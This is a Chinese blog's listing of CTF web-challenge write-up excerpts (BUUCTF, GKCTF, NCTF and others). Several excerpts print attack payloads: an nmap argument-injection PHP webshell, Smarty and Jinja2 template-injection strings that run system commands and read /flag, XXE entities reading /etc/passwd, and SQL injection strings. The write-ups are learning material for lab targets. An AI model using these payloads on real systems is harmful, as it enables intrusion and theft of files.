- 博客(39)
- 收藏
- 关注
原创 [GKCTF2020]EZ三剑客-EzWeb
[GKCTF2020]EZ三剑客-EzWebctrl u查源码,里面有个?secret访问后有一串代码eth0 Link encap:Ethernet HWaddr 02:42:0a:00:73:09 inet addr:10.0.115.9 Bcast:10.0.115.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1450 Metric:1 RX
2021-03-26 22:43:49 662
原创 [VNCTF 2021]Ez_game
一个还不错的打怪小游戏解法一可以在控制台里修改游戏数据然后就能轻松打过十关了解法二源码里面有一段 sojson.v4加密的代码放在在线工具里解码,就可以找到flag
2021-03-26 19:38:50 470
原创 2021-01-31
[BJDCTF 2nd]xss之光扫后台,有.git 泄露githack下载下来<?php$a = $_GET['yds_is_so_beautiful'];echo unserialize($a);源码只有这三行。可触发序列化中的魔术方法__toString__toString的原生类:ERROR 适用于php7版本Error类就是php的一个内置类用于自动自定义一个Error,在php7的环境下可能会造成一个xss漏洞,因为它内置有一个toString的方
2021-01-31 23:36:15 534
原创 [CISCN2019 华东南赛区]Web11
[CISCN2019 华东南赛区]Web11看到这个页面就想到抓包xff处注入猜测有sstismarty模板注入{if phpinfo()}{/if}{if system('ls')}{/if}{if readfile('/flag')}{/if}{if show_source('/flag')}{/if}{if system('cat ../../../flag')}{/if} {if system('ls ../../../../..')}{/if}{if readf
2021-01-31 23:17:49 100
原创 [GKCTF2020]老八小超市儿
[GKCTF2020]老八小超市儿进去之后是一个由ShopXO CMS搭建的网站默认后台地址以及账号密码:/admin.php | admin:shopxo进入后台,主题传马传到_static_目录下这一步一开始我用的是1.7的不行,1.8才可以蚁剑连接flag里面是假的flag.hint,让我们获得root权限auto.sh,每60s执行一次这个py程序,名字还是makeflaghint,猜测它有root权限在程序中添加两行代码flag=io.open("/roo
2021-01-31 22:58:46 192
原创 [GYCTF2020]FlaskApp
[GYCTF2020]FlaskApp官方write up说看到根据hint1,失败乃成功之母,应该能想到flask的debug模式。debug模式的情况下可以抛出详细异常信息base64解密界面随意输入字符串,导致解码报错提示存在ssti注入flask模板注入框架查看根目录{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__glo
2021-01-31 20:30:56 505
原创 2021-01-30
[网鼎杯 2020 朱雀组]Nmap考nmap的用法,但是我不会用上次online tool的payload?host=' <?php @eval($_POST["cmd"]);?> -oG yjh.php '回显hacker猜测是过滤了php?host=' <?= @eval($_POST["cmd"]);?> -oG yjh.phtml '这样可以蚁剑连,也可以post一个命令https://www.bilibili.com/video/av7958638
2021-01-30 21:17:51 188
原创 [BJDCTF 2nd]xss之光
[BJDCTF 2nd]xss之光扫后台,有.git 泄露githack下载下来<?php$a = $_GET['yds_is_so_beautiful'];echo unserialize($a);源码只有这三行。可触发序列化中的魔术方法__toString__toString的原生类:ERROR 适用于php7版本Error类就是php的一个内置类用于自动自定义一个Error,在php7的环境下可能会造成一个xss漏洞,因为它内置有一个toString的方
2021-01-30 21:17:25 236
原创 [BJDCTF2020]EasySearch
[BJDCTF2020]EasySearchwp说是扫到了swp泄露,但是我没扫到<?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)
2021-01-30 18:29:08 167
原创 [NCTF2019]True XML cookbook
[NCTF2019]True XML cookbook抓包,发现存在XXE漏洞添加外部注入实体<?xml version="1.0" encoding="utf-8" ?><!DOCTYPE hack [<!ENTITY file SYSTEM "file:///flag">]><user> <username>&admin;</username> <password>password<
2021-01-30 16:29:31 442
原创 [NPUCTF2020]ReadlezPHP
[NPUCTF2020]ReadlezPHP在源码里面搜索php,搜到一个访问后是源码<?php#error_reporting(0);class HelloPhp{ public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } public function __de
2021-01-30 13:51:26 293
原创 [MRCTF2020]PYWebsite
[MRCTF2020]PYWebsite进去是这么个页面,在源码里面搜索php搜到了flag.php访问之后是这样看起来要伪造ip,抓包xff试试
2021-01-30 11:40:12 109
原创 [网鼎杯 2020 朱雀组]Nmap
[网鼎杯 2020 朱雀组]Nmap考nmap的用法,但是我不会用上次online tool的payload?host=' <?php @eval($_POST["cmd"]);?> -oG yjh.php '回显hacker猜测是过滤了php?host=' <?= @eval($_POST["cmd"]);?> -oG yjh.phtml '这样可以蚁剑连,也可以post一个命令https://www.bilibili.com/video/av7958638
2021-01-30 00:14:15 163
原创 2021-01-29
[MRCTF2020]Ezpop<?php//flag is in flag.php//WTF IS THIS?//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95//And Crack It!class Modifier { 第一个类
2021-01-29 23:33:09 329
原创 [WUSTCTF2020]朴实无华
[WUSTCTF2020]朴实无华据wp所说,看到bot就想到了robots.txt反正我是没注意到bot,也没想到robots.txt太菜了! 访问看了wp说响应头里有提示,我还是没想到,还是太菜!?phpheader('Content-type:text/html;charset=utf-8');error_reporting(0);highlight_file(__file__);//level 1if (isset($_GET['num'])){ $num =
2021-01-29 23:28:53 119
原创 [SWPU2019]Web1
[SWPU2019]Web1登录页面没发现什么注入点,随便注册了一个在广告页面输一个1'这不就是sql注入1' or 1=1--+测试之后是检测了–+,除此之外#等其他的注释符也被过滤了因为测试出闭合方式是单引号,所以结尾可以用单引号闭合1' union select 1,2,3'空格全没了哇,用/**/代替空格-1'/**/union/**/select/**/1,2,3'列数不对,竟然不是三列,难道是四列?-1'union/**/select/**/1,2,3,4,5
2021-01-29 21:37:24 367
原创 [BSidesCF 2020]Had a bad day
[BSidesCF 2020]Had a bad day猜测可能有sql注入或者文件包含尝试了sql注入有报错确定是文件包含了,并且还在后面连接了一个.phpphp://filter/read=convert.base64-encode/resource=index<?php $file = $_GET['category'];if(isset($file)){ if( strpos( $file, "woofers" ) !== false || strpos( $fi
2021-01-29 17:48:12 456
原创 cs反序列化4
cs反序列化4<?phphighlight_file(__FILE__);error_reporting(0);class test{ public $peguin; public $source; public function __construct($file){ $this->source = $file; echo 'welcome to '.$this->source."<br>"; }
2021-01-29 11:21:56 357
原创 [MRCTF2020]Ezpop
[MRCTF2020]Ezpop<?php//flag is in flag.php//WTF IS THIS?//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95//And Crack It!class Modifier { 第一个类
2021-01-29 00:06:22 435
原创 cs反序列化3
cs反序列化3http://111.229.84.70:9996/<?phphighlight_file(__FILE__);class HZNU{ private $username; private $password; public function __construct($user,$pass){ $this->username=$user; $this->password=$pass; }
2021-01-28 18:53:53 85
原创 cs反序列化2
cs反序列化2http://111.229.84.70:9998/<?phphighlight_file(__FILE__);class HZNU{ private $username; private $password; public function __construct($user,$pass){ $this->username=$user; $this->password=$pass; }
2021-01-28 18:29:25 150 2
原创 cs反序列化1
cs反序列化1http://111.229.84.70:9997/参考:https://www.cnblogs.com/Jim2g/articles/13641685.htmlllinux命令:https://wenwen.sogou.com/z/q797390881.htm?rcer=g9PEmO6OUhz-HfDog<?phperror_reporting(0);highlight_file(__FILE__);class Person{ public $username='
2021-01-28 17:31:10 119
原创 [安洵杯 2019]easy_serialize_php
[安洵杯 2019]easy_serialize_php反序列化<?php$function = @$_GET['f'];function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img);}//正则替换,替换为空
2021-01-28 15:34:42 219
原创 [0CTF 2016]piapiapia
[0CTF 2016]piapiapiawww.zip文件泄露,(其实我自己扫第一遍的时候没有扫到,后来多扫了几遍才扫到的)config.php,里面有flagupdate.php<?php require_once('class.php'); if($_SESSION['username'] == null) { die('Login First'); } if($_POST['phone'] && $_POST['email'] && $_
2021-01-28 00:31:16 387 2
原创 [BJDCTF2020]Cookie is so stable
[BJDCTF2020]Cookie is so stable像这种输什么回显什么的可以猜测是ssti注入注入模板在区分Jinja2和Twig那里是这样的:Twig {{7*'7'}} #输出49Jinja{{7*'7'}} #输出7777777开始判断:{7*7}{{7*'7'}}所以注入模板是twighint里面有提示抓包,user是注入点(抓包经过非常坎坷,开始是在输入页面抓包,抓出来的包没有回显,后来是在回显的页面抓到的包测试才有正常的回显)直接用网
2021-01-27 20:01:32 308
原创 [CISCN 2019 初赛]Love Math
[CISCN 2019 初赛]Love Math<?phperror_reporting(0);//听说你很喜欢数学,不知道你是否爱它胜过爱flagif(!isset($_GET['c'])){ show_source(__FILE__);}else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算"); } $bla
2021-01-27 14:00:59 1668 3
原创 [ASIS 2019]Unicorn shop
[ASIS 2019]Unicorn shop这里Price处限制字符长度只能为一个字符前三个都回显是错误的商品那么很明显是要输入一个字符,然后值>1337https://www.compart.com/en/unicode/直接搜thousand,会有一大堆随便挑一个ↈ...
2021-01-26 22:19:38 219
原创 [NCTF2019]Fake XML cookbook
[NCTF2019]Fake XML cookbookxml实体注入,原理参考https://www.freebuf.com/vuls/175451.html先抓包添加恶意实体,读取/etc/passwd文件<?xml version="1.0" encoding="utf-8"?><!DOCTYPE note [ <!ENTITY admin SYSTEM "file:///etc/passwd"> ]><user><userna
2021-01-26 21:09:13 109
原创 [BJDCTF 2nd]假猪套天下第一
[BJDCTF 2nd]假猪套天下第抓包分析,发现有个进Login.php,抓包改时间改大一点ip地址,那么添加xffxff不行再试试Client-ip这里是添加Referer上网搜了一下,Commodo 64是个浏览器,那么把Firefox改成Commodo 64这里一直改不对,看了wp说这个浏览器的全称是Commodore 64email就是添加From服务器地址需要是y1ng.vip,添加Via...
2021-01-26 19:36:06 132
原创 [GKCTF2020]CheckIN
[GKCTF2020]CheckIN<title>Check_In</title><?php highlight_file(__FILE__);class ClassName{ public $code = null; public $decode = null; function __construct() { $this->code = @$this->x(
2021-01-26 17:44:49 326
原创 [网鼎杯 2020 朱雀组]phpweb
[网鼎杯 2020 朱雀组]phpweb抓包之后是这么个玩意func是一个函数名,而p是一个参数,所以可以猜测用func来执行p我们试一试highlight_file和index.php有回显但是很乱用func=file_get_contents&p=index.php <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo"
2021-01-26 15:56:58 744
原创 [BJDCTF2020]ZJCTF,不过如此
[BJDCTF2020]ZJCTF,不过如此<?phperror_reporting(0);$text = $_GET["text"];$file = $_GET["file"];if(isset($text)&&(file_get_contents($text,'r')==="I have a dream"))//text的内容是……,这里用data伪协议写入{ echo "<br><h1>".file_get_contents($tex
2021-01-25 23:33:57 199
原创 [BJDCTF2020]The mystery of ip
[BJDCTF2020]The mystery of iphint的源码里面有这句话flag里面显示的是ip地址,那么就可以猜测是xff注入bp里试一下X-Forwarded-for:text这种输什么回显什么的可以猜测ssti注入X-Forwarded-for:{{system('ls')}}X-Forwarded-for:{{system('cat /flag.php')}}看来不是这个X-Forwarded-for:{{system('ls ../../../../.
2021-01-25 21:44:57 451
原创 [安洵杯 2019]easy_web
[安洵杯 2019]easy_weburl里面有一串很像base64编码的字符串,解码再解所以我们可以猜测,url里存在文件包含漏洞,文件名可以通过hex加密一次,base64加密两次传入试着把index.php传入index.phphex: 696E6465782E706870base64: Njk2RTY0NjU3ODJFNzA2ODcwbase64: TmprMlJUWTBOalUzT0RKRk56QTJPRGN3将url里面img的参数改成TmprMlJUWTBOalUz
2021-01-25 19:46:19 513
原创 [BJDCTF 2nd]old-hack
thinkphp5s=1使用以下方法可以进行远程命令执行https://blog.csdn.net/qq_38807738/article/details/86777541POST /index.php?s=captcha HTTP/1.1Host: 你的idUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0Accept: text/html,applicatio
2021-01-25 16:44:58 112
原创 ctfshow刷题记录
web21' union select 1,2,3#注入点在21' union select 1,database(),3#web21' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#flag,user1' union select 1,group_concat(column_name),3 from informatio
2021-01-23 22:09:45 291
原创 1.19buu刷题记录
[网鼎杯 2018]Fakebookssrf参考:https://www.freebuf.com/articles/web/260806.htmlwp参考:https://blog.csdn.net/weixin_43940853/article/details/105081522遇事不决扫后台robots.txt泄露源码/user.php.bak,审计一下//user.php.bak<?phpclass UserInfo{ public $name = ""; pu
2021-01-19 15:49:16 358
原创 buu刷题记录
[ZJCTF 2019]NiZhuanSiWei<?php $text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')
2021-01-18 19:56:55 857
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人